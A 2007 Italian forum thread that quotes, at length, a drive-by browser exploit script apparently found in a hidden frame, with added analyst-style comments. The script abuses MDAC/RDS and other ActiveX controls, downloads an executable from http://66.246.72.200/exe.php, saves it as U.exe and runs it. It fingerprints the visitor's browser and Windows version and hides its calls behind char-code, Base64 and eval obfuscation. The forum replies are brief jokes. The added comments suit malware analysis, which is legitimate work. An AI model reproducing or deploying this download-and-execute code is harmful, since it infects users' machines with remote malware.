exploit = "var xml = new Ac"+"tiv"+"eX"+"Object('Mic'+'ros'+'oft.X'+'ML"+"HTTP');";
// Synchronous GET (third argument 0) of the second-stage file.
exploit += "xml.Open('GET','http://66.246.72.200/exe.php',0);xml.Send();";
exploit += "var stream = new Ac"+"ti"+"veXO"+"bj"+"ect('AD"+"ODB.Stre"+"am');stream.Mode = 3;";
// Type 1 = binary stream; the response body is saved with overwrite option 2.
exploit += "stream.Type = 1;stream.Open();stream.Write(xml.responseBody);str eam.SaveToFile('../U.exe',2); ";
payCode = escape(exploit);
// The assembled script is spliced between the object creation and the ShellExecute call.
pocCode = 'res://mmcndmgr.dll/pr'+'evsym12.htm#%29%3B%3C/style%3E%3Cscript%20lan'+'guage%3D%27js'+'cript%27 %3Ea%3Dnew%20ActiveXObject%28%27She'+'ll.App'+'lic ation%27%29%3B'+payCode+'a.Shel'+'lExec'+'ute%28%2 7../U.exe%27%29%3B%3C/sc'+'ript%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';
document.location = pocCode;
}

/**
 * Asks an already-created object `o` to instantiate another COM object by
 * name, trying six call shapes in turn and keeping the first that yields a
 * truthy result. The method names are built at run time: the char codes spell
 * "CreateObject", "Create" and "Get", and the Base64 literal decodes to
 * "object".
 *
 * Triage signal: object creation delegated to a host object through
 * eval("r = o." + ...) rather than a direct `new ActiveXObject(...)`.
 *
 * NOTE(review): "1 06", "decode 64" and "String.f romCharCode" contain spaces
 * inserted by the forum software; as shown, those lines do not evaluate.
 *
 * @param {object} o Host object expected to expose a Create/Get-object method.
 * @param {string} n ProgID of the object to create.
 * @returns {object|null} The created object, or null when every attempt failed.
 */
function newRdsObject(o, n)
{
var r = null;
var ddd=null;
// Each attempt swallows its own error so the next call shape can be tried.
try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101,79,98,1 06,101,99,116)+"(n)") }catch(e){}
if (! r) {try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101)+decode 64(String.fromCharCode(98,50,74,113,90,87,78,48))+"(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101)+decode 64(String.fromCharCode(98,50,74,113,90,87,78,48))+"(n, \"\", \"\")") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(String.f romCharCode(98,50,74,113,90,87,78,48))+"(\"\", n)") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(String.f romCharCode(98,50,74,113,90,87,78,48))+"(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(String.f romCharCode(98,50,74,113,90,87,78,48))+"(n)") }catch(e){}}
ddd=r;
return(ddd);
}
var mdk=0;
/**
 * Download-and-run sequence performed through objects obtained from host
 * object `a` via newRdsObject: an XMLHTTP object fetches a file, an
 * ADODB stream object writes the response body to disk, and a
 * Shell.Application object starts it. On success the global mdk is set to 1.
 *
 * Indicators visible in this block:
 *   - network: http://66.246.72.200/exe.php (synchronous GET)
 *   - file:    the fn literal below, which evaluates to C:\\U.exe
 *
 * The ProgIDs are char-code lists ("msxml2.XMLHTTP", "adodb.stream") and the
 * method names are Base64 literals passed through eval().
 *
 * The function has no return statement, so callers always receive undefined.
 *
 * @param {object} a Host object passed on to newRdsObject.
 */
function Go(a)
{

var obj_exploit = newRdsObject(a,String.fromCharCode(109,115,120,109 ,108,50,46,88,77,76,72,84,84,80));
obj_exploit.open(String.fromCharCode(71,69,84),"http://66.246.72.200/exe.php",false);
// Hidden call: sends the request.
eval("obj_exploit"+decode64("LnNlbmQoKTs="));
var obj_adodb = newRdsObject(a,String.fromCharCode(97,100,111,100, 98,46,115,116,114,101,97,109));
// type 1 = binary stream.
obj_adodb.type = 1;
// Hidden calls: open the stream, write the HTTP response body, save to fn.
eval(decode64("b2JqX2Fkb2RiLm9wZW4oKTs="));
eval("obj_adodb"+".Write"+"("+decode64("b2JqX2V4cGxvaXQucmVzcG9uc2VCb2R5")+");");
var fn = "C:\\\\U.exe";
eval("obj_adodb"+"."+decode64("U2F2ZVRvRmlsZQ==")+"(fn,2);");
var s = newRdsObject(a, decode64("U2hlbGwuQXBwbGljYXRpb24="));
// mdk records that the saved file was launched; failures are swallowed.
try { s.ShellExecute(fn); mdk=1; } catch(e) { }


}

function makePayLoad()
{
var mdacPay = new Array(
String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,48,125),
String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,54,125),
String.fromCharCode(123,65,66,57,66,67,69,68,68,45 ,69,67,55,69,45,52,55,69,49,45,57,51,50,50,45,68,5 2,65,50,49,48,54,49,55,49,49,54,125),
String.fromCharCode(123,48,48,48,54,70,48,51,51,45 ,48,48,48,48,45,48,48,48,48,45,67,48,48,48,45,48,4 8,48,48,48,48,48,48,48,48,52,54,125),
String.fromCharCode(123,48,48,48,54,70,48,51,65,45 ,48,48,48,48,45,48,48,48,48,45,67,48,48,48,45,48,4 8,48,48,48,48,48,48,48,48,52,54,125),
String.fromCharCode(123,54,101,51,50,48,55,48,97,4 5,55,54,54,100,45,52,101,101,54,45,56,55,57,99,45, 100,99,49,102,97,57,49,100,50,102,99,51,125),
String.fromCharCode(123,54,52,49,52,53,49,50,66,45 ,66,57,55,56,45,52,53,49,68,45,65,48,68,56,45,70,6 7,70,68,70,51,51,69,56,51,51,67,125),
String.fromCharCode(123,55,70,53,66,55,70,54,51,45 ,70,48,54,70,45,52,51,51,49,45,56,65,50,54,45,51,5 1,57,69,48,51,67,48,65,69,51,68,125),
String.fromCharCode(123,48,54,55,50,51,69,48,57,45 ,70,52,67,50,45,52,51,99,56,45,56,51,53,56,45,48,5 7,70,67,68,49,68,66,48,55,54,54,125),
String.fromCharCode(123,54,51,57,70,55,50,53,70,45 ,49,66,50,68,45,52,56,51,49,45,65,57,70,68,45,56,5 5,52,56,52,55,54,56,50,48,49,48,125),
String.fromCharCode(123,66,65,48,49,56,53,57,57,45 ,49,68,66,51,45,52,52,102,57,45,56,51,66,52,45,52, 54,49,52,53,52,67,56,52,66,70,56,125),
String.fromCharCode(123,68,48,67,48,55,68,53,54,45 ,55,67,54,57,45,52,51,70,49,45,66,52,65,48,45,50,5 3,70,53,65,49,49,70,65,66,49,57,125),
String.fromCharCode(123,69,56,67,67,67,68,68,70,45 ,67,65,50,56,45,52,57,54,98,45,66,48,53,48,45,54,6 7,48,55,67,57,54,50,52,55,54,66,125),
String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,48,125),null);
return mdacPay;
}


/**
 * Walks the list returned by makePayLoad() (terminated by null). Entries that
 * start with "{" are treated as class IDs and turned into an object element
 * with a classid attribute; other entries are passed to ActiveXObject. Each
 * resulting object is tested with newRdsObject and, if it can create a
 * Shell.Application object, handed to Go(). If nothing set the global mdk,
 * the function falls back to the other *_exploit routines according to the
 * is* probe flags and finally calls setslice_exploit().
 *
 * The tag name, attribute name and "clsid:" prefix are all assembled from
 * char codes and arithmetic (98-1, 102+3) so that "object" and "classid"
 * never appear as literals.
 *
 * NOTE(review): "String.fromCharCod e" and "String. fromCharCode" contain
 * spaces inserted by the forum software.
 */
function mdac_exploit()
{
var i = 0;
var mdacPay = makePayLoad();
while (mdacPay[i])
{
var a = null;
if (mdacPay[i].substring(0,1) == "{")
{
// Braces are stripped from the entry before it is appended to "clsid:".
a = document.createElement(decode64(String.fromCharCod e(98,50,74,113,90,87,78,48)));
a.setAttribute(String.fromCharCode(99,108)+String. fromCharCode(98-1,115,115)+String.fromCharCode(102+3,100), String.fromCharCode(99,108)+ String.fromCharCode(115,105,100,58) + mdacPay[i].substring(1, mdacPay[i].length - 1));
}
else { try { a = eval("new A"+"ctive"+"XObject")(mdacPay[i]); } catch(e){}}

if (a)
{
try
{
var b = newRdsObject(a, decode64("U2hlbGwuQXBwbGljYXRpb24="));
// Go() returns undefined, so this break is never taken; success is tracked via mdk.
if (b) { if (Go(a)) break;}
}
catch(e){}
}
i++;
}
if(mdk==0)
{
// isqt is not defined anywhere in the visible listing.
if ( iswzip || isqt || isya || isya2 ||issdk)
{


if (isya2) yahoo2_exploit();
if (isya) yahoo_exploit();
if (issdk) sdk_exploit();
if (iswzip) winzip_exploit();

}
setslice_exploit();
}
}

/**
 * Software probe: tries to instantiate the WZFILEVIEW.FileViewCtrl.61 ActiveX
 * control and reports whether that succeeded. The result gates
 * winzip_exploit() later in the script. "new ActiveXObject" is split into
 * fragments so the keyword is not present as a literal.
 *
 * @returns {number} 1 when the control could be created, otherwise 0.
 */
function testwzip()
{
iswzip = 0;
try { var wzip = eval("ne"+"w A"+"cti"+"ve"+"X"+"Obj"+"e"+"ct('WZFILEVIEW.'+'FileViewCtrl.61');"); iswzip = 1; }
catch(e){};
return iswzip;
}




// Driver: runs as soon as the hidden frame loads. It fingerprints the visitor
// (installed control, browser family, Windows version) and dispatches to one
// of the routines above. For analysts, this is the block that shows which
// paths are reachable: firefox_exploit and firefox1_exploit are defined in the
// listing but never called from here.
var isMemory = false;
// Delay unit used with setTimeout (interval * 500 ms).
var interval = 3;
var exploit = 0;
var iswzip = testwzip();

var browser = testBrowser();
var system = getVersion();

// For IE on Windows 2000, w2k_exploit() is invoked here and again in the branch below.
if (browser == "MSIE" && system == "2K") w2k_exploit();

if (browser == "MSIE")
{
if (system == "2K") w2k_exploit();
else mdac_exploit();
// If nothing reported success, the frame is sent to an innocuous site.
if(mdk==0) document.location="http://google.com"
}
else
{


// Every non-IE browser gets the media-player path after 1.5 s.
setTimeout('wmplayer_exploit();',interval * 500);
}


</script>

</html>

andrea.paiola
08-09-2007, 19:15
ora è diventato tecnico :fighet: :D

Vincent.Zeno
08-09-2007, 19:16
e ti sembra normale tutto questo in un frame nascosto?

Drean
08-09-2007, 19:16
http://img251.imageshack.us/img251/34/saywutoe3.jpg

fred84
08-09-2007, 19:20
Originariamente inviato da Drean
http://img251.imageshack.us/img251/34/saywutoe3.jpg :malol: :malol: :malol: :malol: :malol: :malol: :malol: :malol:
